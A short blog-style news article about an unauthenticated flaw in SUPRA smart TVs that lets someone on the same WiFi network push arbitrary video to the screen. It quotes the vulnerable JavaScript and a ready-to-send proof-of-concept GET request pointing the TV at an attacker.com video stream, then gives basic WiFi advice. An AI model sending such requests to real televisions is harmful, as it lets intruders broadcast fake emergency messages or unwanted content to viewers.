Television has evolved so much this past few years, becoming a more like a personal computer. Thanks to the ever advancing technologies. Now we have SMART TV! And a lot of tech companies around the world manufacture Smart TVs because of course people want innovation and new experience on television.
But be careful, because these smart TVs are very phone to attackers.
Recently, Dhiraj Mishra shared his discovery on one smart TV brand’s vulnerability. The brand is SUPRA Smart TV, this is a lesser-known Russian electronics brand, which distributes their products to Russia, China and UAE based ecommerce. They have variety of devices, from several audio and video equipment, to household appliances (such as Refrigerator, Laundry machines, kitchen appliances, etc.), to car electronics.
SUPRA Smart TV brand was discovered to be vulnerable to an unpatched remote file, which could allow WiFi attackers to broadcast fake videos to the TV screens without any series of authentication. The vulnerability was found in “openLiveURL” function of the SUPRA Smart TV. This vulnerability could allow a local attacker to inject a remote file in the broadcast and play fake videos.
According to Mishra: “We are abusing `openLiveURL()` which allows a local attacker to broadcast video on supra smart cloud TV. I found this vulnerability initially by source code review and then by crawling the application and reading every request helped me to trigger this vulnerability.
Vulnerable code:
function openLiveTV(url)
{
$.get("/remote/media_control", {m_action:'setUri',m_uri:url,m_type:'video/*'},
function (data, textStatus){
if("success"==textStatus){
alert(textStatus);
}else
{
alert(textStatus);
}
});
}
Vulnerable request:
GET /remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1 Host: 192.168.1.155 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
Source: https://www.inputzero.io/2019/06/hacking-smart-tv.html
Significant requirement for the attacker to remotely control the SUPRA smart TV is having access to the victim’s WiFi Network by default, so it is important to not share your WiFi password to anyone you do not know or trust, or change your password regularly or set up a very strong password.
So imagine watching your favourite TV show with your kids and then all of a sudden your smart TV screen goes into adult-rated shows, so disgusting right? Or watching your favourite news and then a fake video of an emergency message came up, it would could cause so much panic. It is always important to select the trusted brands to somehow avoid having these vulnerabilities and compromising your information.
